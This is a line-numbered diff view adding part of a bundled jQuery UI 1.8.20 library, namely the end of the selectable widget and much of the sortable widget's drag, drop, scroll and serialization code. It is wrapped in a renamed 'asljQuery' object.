2735 |
+
selectee.$element
|
2736 |
+
.removeClass(doSelect ? "ui-unselecting" : "ui-selected")
|
2737 |
+
.addClass(doSelect ? "ui-selecting" : "ui-unselecting");
|
2738 |
+
selectee.unselecting = !doSelect;
|
2739 |
+
selectee.selecting = doSelect;
|
2740 |
+
selectee.selected = doSelect;
|
2741 |
+
// selectable (UN)SELECTING callback
|
2742 |
+
if (doSelect) {
|
2743 |
+
self._trigger("selecting", event, {
|
2744 |
+
selecting: selectee.element
|
2745 |
+
});
|
2746 |
+
} else {
|
2747 |
+
self._trigger("unselecting", event, {
|
2748 |
+
unselecting: selectee.element
|
2749 |
+
});
|
2750 |
+
}
|
2751 |
+
return false;
|
2752 |
+
}
|
2753 |
+
});
|
2754 |
+
|
2755 |
+
},
|
2756 |
+
|
2757 |
+
_mouseDrag: function(event) {
|
2758 |
+
var self = this;
|
2759 |
+
this.dragged = true;
|
2760 |
+
|
2761 |
+
if (this.options.disabled)
|
2762 |
+
return;
|
2763 |
+
|
2764 |
+
var options = this.options;
|
2765 |
+
|
2766 |
+
var x1 = this.opos[0], y1 = this.opos[1], x2 = event.pageX, y2 = event.pageY;
|
2767 |
+
if (x1 > x2) { var tmp = x2; x2 = x1; x1 = tmp; }
|
2768 |
+
if (y1 > y2) { var tmp = y2; y2 = y1; y1 = tmp; }
|
2769 |
+
this.helper.css({left: x1, top: y1, width: x2-x1, height: y2-y1});
|
2770 |
+
|
2771 |
+
this.selectees.each(function() {
|
2772 |
+
var selectee = $.data(this, "selectable-item");
|
2773 |
+
//prevent helper from being selected if appendTo: selectable
|
2774 |
+
if (!selectee || selectee.element == self.element[0])
|
2775 |
+
return;
|
2776 |
+
var hit = false;
|
2777 |
+
if (options.tolerance == 'touch') {
|
2778 |
+
hit = ( !(selectee.left > x2 || selectee.right < x1 || selectee.top > y2 || selectee.bottom < y1) );
|
2779 |
+
} else if (options.tolerance == 'fit') {
|
2780 |
+
hit = (selectee.left > x1 && selectee.right < x2 && selectee.top > y1 && selectee.bottom < y2);
|
2781 |
+
}
|
2782 |
+
|
2783 |
+
if (hit) {
|
2784 |
+
// SELECT
|
2785 |
+
if (selectee.selected) {
|
2786 |
+
selectee.$element.removeClass('ui-selected');
|
2787 |
+
selectee.selected = false;
|
2788 |
+
}
|
2789 |
+
if (selectee.unselecting) {
|
2790 |
+
selectee.$element.removeClass('ui-unselecting');
|
2791 |
+
selectee.unselecting = false;
|
2792 |
+
}
|
2793 |
+
if (!selectee.selecting) {
|
2794 |
+
selectee.$element.addClass('ui-selecting');
|
2795 |
+
selectee.selecting = true;
|
2796 |
+
// selectable SELECTING callback
|
2797 |
+
self._trigger("selecting", event, {
|
2798 |
+
selecting: selectee.element
|
2799 |
+
});
|
2800 |
+
}
|
2801 |
+
} else {
|
2802 |
+
// UNSELECT
|
2803 |
+
if (selectee.selecting) {
|
2804 |
+
if ((event.metaKey || event.ctrlKey) && selectee.startselected) {
|
2805 |
+
selectee.$element.removeClass('ui-selecting');
|
2806 |
+
selectee.selecting = false;
|
2807 |
+
selectee.$element.addClass('ui-selected');
|
2808 |
+
selectee.selected = true;
|
2809 |
+
} else {
|
2810 |
+
selectee.$element.removeClass('ui-selecting');
|
2811 |
+
selectee.selecting = false;
|
2812 |
+
if (selectee.startselected) {
|
2813 |
+
selectee.$element.addClass('ui-unselecting');
|
2814 |
+
selectee.unselecting = true;
|
2815 |
+
}
|
2816 |
+
// selectable UNSELECTING callback
|
2817 |
+
self._trigger("unselecting", event, {
|
2818 |
+
unselecting: selectee.element
|
2819 |
+
});
|
2820 |
+
}
|
2821 |
+
}
|
2822 |
+
if (selectee.selected) {
|
2823 |
+
if (!event.metaKey && !event.ctrlKey && !selectee.startselected) {
|
2824 |
+
selectee.$element.removeClass('ui-selected');
|
2825 |
+
selectee.selected = false;
|
2826 |
+
|
2827 |
+
selectee.$element.addClass('ui-unselecting');
|
2828 |
+
selectee.unselecting = true;
|
2829 |
+
// selectable UNSELECTING callback
|
2830 |
+
self._trigger("unselecting", event, {
|
2831 |
+
unselecting: selectee.element
|
2832 |
+
});
|
2833 |
+
}
|
2834 |
+
}
|
2835 |
+
}
|
2836 |
+
});
|
2837 |
+
|
2838 |
+
return false;
|
2839 |
+
},
|
2840 |
+
|
2841 |
+
_mouseStop: function(event) {
|
2842 |
+
var self = this;
|
2843 |
+
|
2844 |
+
this.dragged = false;
|
2845 |
+
|
2846 |
+
var options = this.options;
|
2847 |
+
|
2848 |
+
$('.ui-unselecting', this.element[0]).each(function() {
|
2849 |
+
var selectee = $.data(this, "selectable-item");
|
2850 |
+
selectee.$element.removeClass('ui-unselecting');
|
2851 |
+
selectee.unselecting = false;
|
2852 |
+
selectee.startselected = false;
|
2853 |
+
self._trigger("unselected", event, {
|
2854 |
+
unselected: selectee.element
|
2855 |
+
});
|
2856 |
+
});
|
2857 |
+
$('.ui-selecting', this.element[0]).each(function() {
|
2858 |
+
var selectee = $.data(this, "selectable-item");
|
2859 |
+
selectee.$element.removeClass('ui-selecting').addClass('ui-selected');
|
2860 |
+
selectee.selecting = false;
|
2861 |
+
selectee.selected = true;
|
2862 |
+
selectee.startselected = true;
|
2863 |
+
self._trigger("selected", event, {
|
2864 |
+
selected: selectee.element
|
2865 |
+
});
|
2866 |
+
});
|
2867 |
+
this._trigger("stop", event);
|
2868 |
+
|
2869 |
+
this.helper.remove();
|
2870 |
+
|
2871 |
+
return false;
|
2872 |
+
}
|
2873 |
+
|
2874 |
+
});
|
2875 |
+
|
2876 |
+
$.extend($.ui.selectable, {
|
2877 |
+
version: "1.8.20"
|
2878 |
+
});
|
2879 |
+
|
2880 |
+
})(asljQuery);
|
2881 |
+
|
2882 |
+
(function( $, undefined ) {
|
2883 |
+
|
2884 |
+
$.widget("ui.sortable", $.ui.mouse, {
|
2885 |
+
widgetEventPrefix: "sort",
|
2886 |
+
ready: false,
|
2887 |
+
options: {
|
2888 |
+
appendTo: "parent",
|
2889 |
+
axis: false,
|
2890 |
+
connectWith: false,
|
2891 |
+
containment: false,
|
2892 |
+
cursor: 'auto',
|
2893 |
+
cursorAt: false,
|
2894 |
+
dropOnEmpty: true,
|
2895 |
+
forcePlaceholderSize: false,
|
2896 |
+
forceHelperSize: false,
|
2897 |
+
grid: false,
|
2898 |
+
handle: false,
|
2899 |
+
helper: "original",
|
2900 |
+
items: '> *',
|
2901 |
+
opacity: false,
|
2902 |
+
placeholder: false,
|
2903 |
+
revert: false,
|
2904 |
+
scroll: true,
|
2905 |
+
scrollSensitivity: 20,
|
2906 |
+
scrollSpeed: 20,
|
2907 |
+
scope: "default",
|
2908 |
+
tolerance: "intersect",
|
2909 |
+
zIndex: 1000
|
2910 |
+
},
|
2911 |
+
_create: function() {
|
2912 |
+
|
2913 |
+
var o = this.options;
|
2914 |
+
this.containerCache = {};
|
2915 |
+
this.element.addClass("ui-sortable");
|
2916 |
+
|
2917 |
+
//Get the items
|
2918 |
+
this.refresh();
|
2919 |
+
|
2920 |
+
//Let's determine if the items are being displayed horizontally
|
2921 |
+
this.floating = this.items.length ? o.axis === 'x' || (/left|right/).test(this.items[0].item.css('float')) || (/inline|table-cell/).test(this.items[0].item.css('display')) : false;
|
2922 |
+
|
2923 |
+
//Let's determine the parent's offset
|
2924 |
+
this.offset = this.element.offset();
|
2925 |
+
|
2926 |
+
//Initialize mouse events for interaction
|
2927 |
+
this._mouseInit();
|
2928 |
+
|
2929 |
+
//We're ready to go
|
2930 |
+
this.ready = true
|
2931 |
+
|
2932 |
+
},
|
2933 |
+
|
2934 |
+
destroy: function() {
|
2935 |
+
$.Widget.prototype.destroy.call( this );
|
2936 |
+
this.element
|
2937 |
+
.removeClass("ui-sortable ui-sortable-disabled");
|
2938 |
+
this._mouseDestroy();
|
2939 |
+
|
2940 |
+
for ( var i = this.items.length - 1; i >= 0; i-- )
|
2941 |
+
this.items[i].item.removeData(this.widgetName + "-item");
|
2942 |
+
|
2943 |
+
return this;
|
2944 |
+
},
|
2945 |
+
|
2946 |
+
_setOption: function(key, value){
|
2947 |
+
if ( key === "disabled" ) {
|
2948 |
+
this.options[ key ] = value;
|
2949 |
+
|
2950 |
+
this.widget()
|
2951 |
+
[ value ? "addClass" : "removeClass"]( "ui-sortable-disabled" );
|
2952 |
+
} else {
|
2953 |
+
// Don't call widget base _setOption for disable as it adds ui-state-disabled class
|
2954 |
+
$.Widget.prototype._setOption.apply(this, arguments);
|
2955 |
+
}
|
2956 |
+
},
|
2957 |
+
|
2958 |
+
_mouseCapture: function(event, overrideHandle) {
|
2959 |
+
var that = this;
|
2960 |
+
|
2961 |
+
if (this.reverting) {
|
2962 |
+
return false;
|
2963 |
+
}
|
2964 |
+
|
2965 |
+
if(this.options.disabled || this.options.type == 'static') return false;
|
2966 |
+
|
2967 |
+
//We have to refresh the items data once first
|
2968 |
+
this._refreshItems(event);
|
2969 |
+
|
2970 |
+
//Find out if the clicked node (or one of its parents) is a actual item in this.items
|
2971 |
+
var currentItem = null, self = this, nodes = $(event.target).parents().each(function() {
|
2972 |
+
if($.data(this, that.widgetName + '-item') == self) {
|
2973 |
+
currentItem = $(this);
|
2974 |
+
return false;
|
2975 |
+
}
|
2976 |
+
});
|
2977 |
+
if($.data(event.target, that.widgetName + '-item') == self) currentItem = $(event.target);
|
2978 |
+
|
2979 |
+
if(!currentItem) return false;
|
2980 |
+
if(this.options.handle && !overrideHandle) {
|
2981 |
+
var validHandle = false;
|
2982 |
+
|
2983 |
+
$(this.options.handle, currentItem).find("*").andSelf().each(function() { if(this == event.target) validHandle = true; });
|
2984 |
+
if(!validHandle) return false;
|
2985 |
+
}
|
2986 |
+
|
2987 |
+
this.currentItem = currentItem;
|
2988 |
+
this._removeCurrentsFromItems();
|
2989 |
+
return true;
|
2990 |
+
|
2991 |
+
},
|
2992 |
+
|
2993 |
+
_mouseStart: function(event, overrideHandle, noActivation) {
|
2994 |
+
|
2995 |
+
var o = this.options, self = this;
|
2996 |
+
this.currentContainer = this;
|
2997 |
+
|
2998 |
+
//We only need to call refreshPositions, because the refreshItems call has been moved to mouseCapture
|
2999 |
+
this.refreshPositions();
|
3000 |
+
|
3001 |
+
//Create and append the visible helper
|
3002 |
+
this.helper = this._createHelper(event);
|
3003 |
+
|
3004 |
+
//Cache the helper size
|
3005 |
+
this._cacheHelperProportions();
|
3006 |
+
|
3007 |
+
/*
|
3008 |
+
* - Position generation -
|
3009 |
+
* This block generates everything position related - it's the core of draggables.
|
3010 |
+
*/
|
3011 |
+
|
3012 |
+
//Cache the margins of the original element
|
3013 |
+
this._cacheMargins();
|
3014 |
+
|
3015 |
+
//Get the next scrolling parent
|
3016 |
+
this.scrollParent = this.helper.scrollParent();
|
3017 |
+
|
3018 |
+
//The element's absolute position on the page minus margins
|
3019 |
+
this.offset = this.currentItem.offset();
|
3020 |
+
this.offset = {
|
3021 |
+
top: this.offset.top - this.margins.top,
|
3022 |
+
left: this.offset.left - this.margins.left
|
3023 |
+
};
|
3024 |
+
|
3025 |
+
// Only after we got the offset, we can change the helper's position to absolute
|
3026 |
+
// TODO: Still need to figure out a way to make relative sorting possible
|
3027 |
+
this.helper.css("position", "absolute");
|
3028 |
+
this.cssPosition = this.helper.css("position");
|
3029 |
+
|
3030 |
+
$.extend(this.offset, {
|
3031 |
+
click: { //Where the click happened, relative to the element
|
3032 |
+
left: event.pageX - this.offset.left,
|
3033 |
+
top: event.pageY - this.offset.top
|
3034 |
+
},
|
3035 |
+
parent: this._getParentOffset(),
|
3036 |
+
relative: this._getRelativeOffset() //This is a relative to absolute position minus the actual position calculation - only used for relative positioned helper
|
3037 |
+
});
|
3038 |
+
|
3039 |
+
//Generate the original position
|
3040 |
+
this.originalPosition = this._generatePosition(event);
|
3041 |
+
this.originalPageX = event.pageX;
|
3042 |
+
this.originalPageY = event.pageY;
|
3043 |
+
|
3044 |
+
//Adjust the mouse offset relative to the helper if 'cursorAt' is supplied
|
3045 |
+
(o.cursorAt && this._adjustOffsetFromHelper(o.cursorAt));
|
3046 |
+
|
3047 |
+
//Cache the former DOM position
|
3048 |
+
this.domPosition = { prev: this.currentItem.prev()[0], parent: this.currentItem.parent()[0] };
|
3049 |
+
|
3050 |
+
//If the helper is not the original, hide the original so it's not playing any role during the drag, won't cause anything bad this way
|
3051 |
+
if(this.helper[0] != this.currentItem[0]) {
|
3052 |
+
this.currentItem.hide();
|
3053 |
+
}
|
3054 |
+
|
3055 |
+
//Create the placeholder
|
3056 |
+
this._createPlaceholder();
|
3057 |
+
|
3058 |
+
//Set a containment if given in the options
|
3059 |
+
if(o.containment)
|
3060 |
+
this._setContainment();
|
3061 |
+
|
3062 |
+
if(o.cursor) { // cursor option
|
3063 |
+
if ($('body').css("cursor")) this._storedCursor = $('body').css("cursor");
|
3064 |
+
$('body').css("cursor", o.cursor);
|
3065 |
+
}
|
3066 |
+
|
3067 |
+
if(o.opacity) { // opacity option
|
3068 |
+
if (this.helper.css("opacity")) this._storedOpacity = this.helper.css("opacity");
|
3069 |
+
this.helper.css("opacity", o.opacity);
|
3070 |
+
}
|
3071 |
+
|
3072 |
+
if(o.zIndex) { // zIndex option
|
3073 |
+
if (this.helper.css("zIndex")) this._storedZIndex = this.helper.css("zIndex");
|
3074 |
+
this.helper.css("zIndex", o.zIndex);
|
3075 |
+
}
|
3076 |
+
|
3077 |
+
//Prepare scrolling
|
3078 |
+
if(this.scrollParent[0] != document && this.scrollParent[0].tagName != 'HTML')
|
3079 |
+
this.overflowOffset = this.scrollParent.offset();
|
3080 |
+
|
3081 |
+
//Call callbacks
|
3082 |
+
this._trigger("start", event, this._uiHash());
|
3083 |
+
|
3084 |
+
//Recache the helper size
|
3085 |
+
if(!this._preserveHelperProportions)
|
3086 |
+
this._cacheHelperProportions();
|
3087 |
+
|
3088 |
+
|
3089 |
+
//Post 'activate' events to possible containers
|
3090 |
+
if(!noActivation) {
|
3091 |
+
for (var i = this.containers.length - 1; i >= 0; i--) { this.containers[i]._trigger("activate", event, self._uiHash(this)); }
|
3092 |
+
}
|
3093 |
+
|
3094 |
+
//Prepare possible droppables
|
3095 |
+
if($.ui.ddmanager)
|
3096 |
+
$.ui.ddmanager.current = this;
|
3097 |
+
|
3098 |
+
if ($.ui.ddmanager && !o.dropBehaviour)
|
3099 |
+
$.ui.ddmanager.prepareOffsets(this, event);
|
3100 |
+
|
3101 |
+
this.dragging = true;
|
3102 |
+
|
3103 |
+
this.helper.addClass("ui-sortable-helper");
|
3104 |
+
this._mouseDrag(event); //Execute the drag once - this causes the helper not to be visible before getting its correct position
|
3105 |
+
return true;
|
3106 |
+
|
3107 |
+
},
|
3108 |
+
|
3109 |
+
_mouseDrag: function(event) {
|
3110 |
+
|
3111 |
+
//Compute the helpers position
|
3112 |
+
this.position = this._generatePosition(event);
|
3113 |
+
this.positionAbs = this._convertPositionTo("absolute");
|
3114 |
+
|
3115 |
+
if (!this.lastPositionAbs) {
|
3116 |
+
this.lastPositionAbs = this.positionAbs;
|
3117 |
+
}
|
3118 |
+
|
3119 |
+
//Do scrolling
|
3120 |
+
if(this.options.scroll) {
|
3121 |
+
var o = this.options, scrolled = false;
|
3122 |
+
if(this.scrollParent[0] != document && this.scrollParent[0].tagName != 'HTML') {
|
3123 |
+
|
3124 |
+
if((this.overflowOffset.top + this.scrollParent[0].offsetHeight) - event.pageY < o.scrollSensitivity)
|
3125 |
+
this.scrollParent[0].scrollTop = scrolled = this.scrollParent[0].scrollTop + o.scrollSpeed;
|
3126 |
+
else if(event.pageY - this.overflowOffset.top < o.scrollSensitivity)
|
3127 |
+
this.scrollParent[0].scrollTop = scrolled = this.scrollParent[0].scrollTop - o.scrollSpeed;
|
3128 |
+
|
3129 |
+
if((this.overflowOffset.left + this.scrollParent[0].offsetWidth) - event.pageX < o.scrollSensitivity)
|
3130 |
+
this.scrollParent[0].scrollLeft = scrolled = this.scrollParent[0].scrollLeft + o.scrollSpeed;
|
3131 |
+
else if(event.pageX - this.overflowOffset.left < o.scrollSensitivity)
|
3132 |
+
this.scrollParent[0].scrollLeft = scrolled = this.scrollParent[0].scrollLeft - o.scrollSpeed;
|
3133 |
+
|
3134 |
+
} else {
|
3135 |
+
|
3136 |
+
if(event.pageY - $(document).scrollTop() < o.scrollSensitivity)
|
3137 |
+
scrolled = $(document).scrollTop($(document).scrollTop() - o.scrollSpeed);
|
3138 |
+
else if($(window).height() - (event.pageY - $(document).scrollTop()) < o.scrollSensitivity)
|
3139 |
+
scrolled = $(document).scrollTop($(document).scrollTop() + o.scrollSpeed);
|
3140 |
+
|
3141 |
+
if(event.pageX - $(document).scrollLeft() < o.scrollSensitivity)
|
3142 |
+
scrolled = $(document).scrollLeft($(document).scrollLeft() - o.scrollSpeed);
|
3143 |
+
else if($(window).width() - (event.pageX - $(document).scrollLeft()) < o.scrollSensitivity)
|
3144 |
+
scrolled = $(document).scrollLeft($(document).scrollLeft() + o.scrollSpeed);
|
3145 |
+
|
3146 |
+
}
|
3147 |
+
|
3148 |
+
if(scrolled !== false && $.ui.ddmanager && !o.dropBehaviour)
|
3149 |
+
$.ui.ddmanager.prepareOffsets(this, event);
|
3150 |
+
}
|
3151 |
+
|
3152 |
+
//Regenerate the absolute position used for position checks
|
3153 |
+
this.positionAbs = this._convertPositionTo("absolute");
|
3154 |
+
|
3155 |
+
//Set the helper position
|
3156 |
+
if(!this.options.axis || this.options.axis != "y") this.helper[0].style.left = this.position.left+'px';
|
3157 |
+
if(!this.options.axis || this.options.axis != "x") this.helper[0].style.top = this.position.top+'px';
|
3158 |
+
|
3159 |
+
//Rearrange
|
3160 |
+
for (var i = this.items.length - 1; i >= 0; i--) {
|
3161 |
+
|
3162 |
+
//Cache variables and intersection, continue if no intersection
|
3163 |
+
var item = this.items[i], itemElement = item.item[0], intersection = this._intersectsWithPointer(item);
|
3164 |
+
if (!intersection) continue;
|
3165 |
+
|
3166 |
+
if(itemElement != this.currentItem[0] //cannot intersect with itself
|
3167 |
+
&& this.placeholder[intersection == 1 ? "next" : "prev"]()[0] != itemElement //no useless actions that have been done before
|
3168 |
+
&& !$.ui.contains(this.placeholder[0], itemElement) //no action if the item moved is the parent of the item checked
|
3169 |
+
&& (this.options.type == 'semi-dynamic' ? !$.ui.contains(this.element[0], itemElement) : true)
|
3170 |
+
//&& itemElement.parentNode == this.placeholder[0].parentNode // only rearrange items within the same container
|
3171 |
+
) {
|
3172 |
+
|
3173 |
+
this.direction = intersection == 1 ? "down" : "up";
|
3174 |
+
|
3175 |
+
if (this.options.tolerance == "pointer" || this._intersectsWithSides(item)) {
|
3176 |
+
this._rearrange(event, item);
|
3177 |
+
} else {
|
3178 |
+
break;
|
3179 |
+
}
|
3180 |
+
|
3181 |
+
this._trigger("change", event, this._uiHash());
|
3182 |
+
break;
|
3183 |
+
}
|
3184 |
+
}
|
3185 |
+
|
3186 |
+
//Post events to containers
|
3187 |
+
this._contactContainers(event);
|
3188 |
+
|
3189 |
+
//Interconnect with droppables
|
3190 |
+
if($.ui.ddmanager) $.ui.ddmanager.drag(this, event);
|
3191 |
+
|
3192 |
+
//Call callbacks
|
3193 |
+
this._trigger('sort', event, this._uiHash());
|
3194 |
+
|
3195 |
+
this.lastPositionAbs = this.positionAbs;
|
3196 |
+
return false;
|
3197 |
+
|
3198 |
+
},
|
3199 |
+
|
3200 |
+
_mouseStop: function(event, noPropagation) {
|
3201 |
+
|
3202 |
+
if(!event) return;
|
3203 |
+
|
3204 |
+
//If we are using droppables, inform the manager about the drop
|
3205 |
+
if ($.ui.ddmanager && !this.options.dropBehaviour)
|
3206 |
+
$.ui.ddmanager.drop(this, event);
|
3207 |
+
|
3208 |
+
if(this.options.revert) {
|
3209 |
+
var self = this;
|
3210 |
+
var cur = self.placeholder.offset();
|
3211 |
+
|
3212 |
+
self.reverting = true;
|
3213 |
+
|
3214 |
+
$(this.helper).animate({
|
3215 |
+
left: cur.left - this.offset.parent.left - self.margins.left + (this.offsetParent[0] == document.body ? 0 : this.offsetParent[0].scrollLeft),
|
3216 |
+
top: cur.top - this.offset.parent.top - self.margins.top + (this.offsetParent[0] == document.body ? 0 : this.offsetParent[0].scrollTop)
|
3217 |
+
}, parseInt(this.options.revert, 10) || 500, function() {
|
3218 |
+
self._clear(event);
|
3219 |
+
});
|
3220 |
+
} else {
|
3221 |
+
this._clear(event, noPropagation);
|
3222 |
+
}
|
3223 |
+
|
3224 |
+
return false;
|
3225 |
+
|
3226 |
+
},
|
3227 |
+
|
3228 |
+
cancel: function() {
|
3229 |
+
|
3230 |
+
var self = this;
|
3231 |
+
|
3232 |
+
if(this.dragging) {
|
3233 |
+
|
3234 |
+
this._mouseUp({ target: null });
|
3235 |
+
|
3236 |
+
if(this.options.helper == "original")
|
3237 |
+
this.currentItem.css(this._storedCSS).removeClass("ui-sortable-helper");
|
3238 |
+
else
|
3239 |
+
this.currentItem.show();
|
3240 |
+
|
3241 |
+
//Post deactivating events to containers
|
3242 |
+
for (var i = this.containers.length - 1; i >= 0; i--){
|
3243 |
+
this.containers[i]._trigger("deactivate", null, self._uiHash(this));
|
3244 |
+
if(this.containers[i].containerCache.over) {
|
3245 |
+
this.containers[i]._trigger("out", null, self._uiHash(this));
|
3246 |
+
this.containers[i].containerCache.over = 0;
|
3247 |
+
}
|
3248 |
+
}
|
3249 |
+
|
3250 |
+
}
|
3251 |
+
|
3252 |
+
if (this.placeholder) {
|
3253 |
+
//$(this.placeholder[0]).remove(); would have been the jQuery way - unfortunately, it unbinds ALL events from the original node!
|
3254 |
+
if(this.placeholder[0].parentNode) this.placeholder[0].parentNode.removeChild(this.placeholder[0]);
|
3255 |
+
if(this.options.helper != "original" && this.helper && this.helper[0].parentNode) this.helper.remove();
|
3256 |
+
|
3257 |
+
$.extend(this, {
|
3258 |
+
helper: null,
|
3259 |
+
dragging: false,
|
3260 |
+
reverting: false,
|
3261 |
+
_noFinalSort: null
|
3262 |
+
});
|
3263 |
+
|
3264 |
+
if(this.domPosition.prev) {
|
3265 |
+
$(this.domPosition.prev).after(this.currentItem);
|
3266 |
+
} else {
|
3267 |
+
$(this.domPosition.parent).prepend(this.currentItem);
|
3268 |
+
}
|
3269 |
+
}
|
3270 |
+
|
3271 |
+
return this;
|
3272 |
+
|
3273 |
+
},
|
3274 |
+
|
3275 |
+
serialize: function(o) {
|
3276 |
+
|
3277 |
+
var items = this._getItemsAsjQuery(o && o.connected);
|
3278 |
+
var str = []; o = o || {};
|
3279 |
+
|
3280 |
+
$(items).each(function() {
|
3281 |
+
var res = ($(o.item || this).attr(o.attribute || 'id') || '').match(o.expression || (/(.+)[-=_](.+)/));
|
3282 |
+
if(res) str.push((o.key || res[1]+'[]')+'='+(o.key && o.expression ? res[1] : res[2]));
|
3283 |
+
});
|
3284 |
+
|
3285 |
+
if(!str.length && o.key) {
|
3286 |
+
str.push(o.key + '=');
|
3287 |
+
}
|
3288 |
+
|
3289 |
+
return str.join('&');
|
3290 |
+
|
3291 |
+
},
|
3292 |
+
|
3293 |
+
toArray: function(o) {
|
3294 |
+
|
3295 |
+
var items = this._getItemsAsjQuery(o && o.connected);
|
3296 |
+
var ret = []; o = o || {};
|
3297 |
+
|
3298 |
+
items.each(function() { ret.push($(o.item || this).attr(o.attribute || 'id') || ''); });
|
3299 |
+
return ret;
|
3300 |
+
|
3301 |
+
},
|
3302 |
+
|
3303 |
+
/* Be careful with the following core functions */
|
3304 |
+
_intersectsWith: function(item) {
|
3305 |
+
|
3306 |
+
var x1 = this.positionAbs.left,
|
3307 |
+
x2 = x1 + this.helperProportions.width,
|
3308 |
+
y1 = this.positionAbs.top,
|
3309 |
+
y2 = y1 + this.helperProportions.height;
|
3310 |
+
|
3311 |
+
var l = item.left,
|
3312 |
+
r = l + item.width,
|
3313 |
+
t = item.top,
|
3314 |
+
b = t + item.height;
|
3315 |
+
|
3316 |
+
var dyClick = this.offset.click.top,
|
3317 |
+
dxClick = this.offset.click.left;
|
3318 |
+
|
3319 |
+
var isOverElement = (y1 + dyClick) > t && (y1 + dyClick) < b && (x1 + dxClick) > l && (x1 + dxClick) < r;
|
3320 |
+
|
3321 |
+
if( this.options.tolerance == "pointer"
|
3322 |
+
|| this.options.forcePointerForContainers
|
3323 |
+
|| (this.options.tolerance != "pointer" && this.helperProportions[this.floating ? 'width' : 'height'] > item[this.floating ? 'width' : 'height'])
|
3324 |
+
) {
|
3325 |
+
return isOverElement;
|
3326 |
+
} else {
|
3327 |
+
|
3328 |
+
return (l < x1 + (this.helperProportions.width / 2) // Right Half
|
3329 |
+
&& x2 - (this.helperProportions.width / 2) < r // Left Half
|
3330 |
+
&& t < y1 + (this.helperProportions.height / 2) // Bottom Half
|
3331 |
+
&& y2 - (this.helperProportions.height / 2) < b ); // Top Half
|
3332 |
+
|
3333 |
+
}
|
3334 |
+
},
|
3335 |
+
|
3336 |
+
_intersectsWithPointer: function(item) {
|
3337 |
+
|
3338 |
+
var isOverElementHeight = (this.options.axis === 'x') || $.ui.isOverAxis(this.positionAbs.top + this.offset.click.top, item.top, item.height),
|
3339 |
+
isOverElementWidth = (this.options.axis === 'y') || $.ui.isOverAxis(this.positionAbs.left + this.offset.click.left, item.left, item.width),
|
3340 |
+
isOverElement = isOverElementHeight && isOverElementWidth,
|
3341 |
+
verticalDirection = this._getDragVerticalDirection(),
|
3342 |
+
horizontalDirection = this._getDragHorizontalDirection();
|
3343 |
+
|
3344 |
+
if (!isOverElement)
|
3345 |
+
return false;
|
3346 |
+
|
3347 |
+
return this.floating ?
|
3348 |
+
( ((horizontalDirection && horizontalDirection == "right") || verticalDirection == "down") ? 2 : 1 )
|
3349 |
+
: ( verticalDirection && (verticalDirection == "down" ? 2 : 1) );
|
3350 |
+
|
3351 |
+
},
|
3352 |
+
|
3353 |
+
_intersectsWithSides: function(item) {
|
3354 |
+
|
3355 |
+
var isOverBottomHalf = $.ui.isOverAxis(this.positionAbs.top + this.offset.click.top, item.top + (item.height/2), item.height),
|
3356 |
+
isOverRightHalf = $.ui.isOverAxis(this.positionAbs.left + this.offset.click.left, item.left + (item.width/2), item.width),
|
3357 |
+
verticalDirection = this._getDragVerticalDirection(),
|
3358 |
+
horizontalDirection = this._getDragHorizontalDirection();
|
3359 |
+
|
3360 |
+
if (this.floating && horizontalDirection) {
|
3361 |
+
return ((horizontalDirection == "right" && isOverRightHalf) || (horizontalDirection == "left" && !isOverRightHalf));
|
3362 |
+
} else {
|
3363 |
+
return verticalDirection && ((verticalDirection == "down" && isOverBottomHalf) || (verticalDirection == "up" && !isOverBottomHalf));
|
3364 |
+
}
|
3365 |
+
|
3366 |
+
},
|
3367 |
+
|
3368 |
+
_getDragVerticalDirection: function() {
|
3369 |
+
var delta = this.positionAbs.top - this.lastPositionAbs.top;
|
3370 |
+
return delta != 0 && (delta > 0 ? "down" : "up");
|
3371 |
+
},
|
3372 |
+
|
3373 |
+
_getDragHorizontalDirection: function() {
|
3374 |
+
var delta = this.positionAbs.left - this.lastPositionAbs.left;
|
3375 |
+
return delta != 0 && (delta > 0 ? "right" : "left");
|
3376 |
+
},
|
3377 |
+
|
3378 |
+
refresh: function(event) {
|
3379 |
+
this._refreshItems(event);
|
3380 |
+
this.refreshPositions();
|
3381 |
+
return this;
|
3382 |
+
},
|
3383 |
+
|
3384 |
+
_connectWith: function() {
|
3385 |
+
var options = this.options;
|
3386 |
+
return options.connectWith.constructor == String
|
3387 |
+
? [options.connectWith]
|
3388 |
+
: options.connectWith;
|
3389 |
+
},
|
3390 |
+
|
3391 |
+
_getItemsAsjQuery: function(connected) {
|
3392 |
+
|
3393 |
+
var self = this;
|
3394 |
+
var items = [];
|
3395 |
+
var queries = [];
|
3396 |
+
var connectWith = this._connectWith();
|
3397 |
+
|
3398 |
+
if(connectWith && connected) {
|
3399 |
+
for (var i = connectWith.length - 1; i >= 0; i--){
|
3400 |
+
var cur = $(connectWith[i]);
|
3401 |
+
for (var j = cur.length - 1; j >= 0; j--){
|
3402 |
+
var inst = $.data(cur[j], this.widgetName);
|
3403 |
+
if(inst && inst != this && !inst.options.disabled) {
|
3404 |
+
queries.push([$.isFunction(inst.options.items) ? inst.options.items.call(inst.element) : $(inst.options.items, inst.element).not(".ui-sortable-helper").not('.ui-sortable-placeholder'), inst]);
|
3405 |
+
}
|
3406 |
+
};
|
3407 |
+
};
|
3408 |
+
}
|
3409 |
+
|
3410 |
+
queries.push([$.isFunction(this.options.items) ? this.options.items.call(this.element, null, { options: this.options, item: this.currentItem }) : $(this.options.items, this.element).not(".ui-sortable-helper").not('.ui-sortable-placeholder'), this]);
|
3411 |
+
|
3412 |
+
for (var i = queries.length - 1; i >= 0; i--){
|
3413 |
+
queries[i][0].each(function() {
|
3414 |
+
items.push(this);
|
3415 |
+
});
|
3416 |
+
};
|
3417 |
+
|
3418 |
+
return $(items);
|
3419 |
+
|
3420 |
+
},
|
3421 |
+
|
3422 |
+
_removeCurrentsFromItems: function() {
|
3423 |
+
|
3424 |
+
var list = this.currentItem.find(":data(" + this.widgetName + "-item)");
|
3425 |
+
|
3426 |
+
for (var i=0; i < this.items.length; i++) {
|
3427 |
+
|
3428 |
+
for (var j=0; j < list.length; j++) {
|
3429 |
+
if(list[j] == this.items[i].item[0])
|
3430 |
+
this.items.splice(i,1);
|
3431 |
+
};
|
3432 |
+
|
3433 |
+
};
|
3434 |
+
|
3435 |
+
},
|
3436 |
+
|
3437 |
+
_refreshItems: function(event) {
|
3438 |
+
|
3439 |
+
this.items = [];
|
3440 |
+
this.containers = [this];
|
3441 |
+
var items = this.items;
|
3442 |
+
var self = this;
|
3443 |
+
var queries = [[$.isFunction(this.options.items) ? this.options.items.call(this.element[0], event, { item: this.currentItem }) : $(this.options.items, this.element), this]];
|
3444 |
+
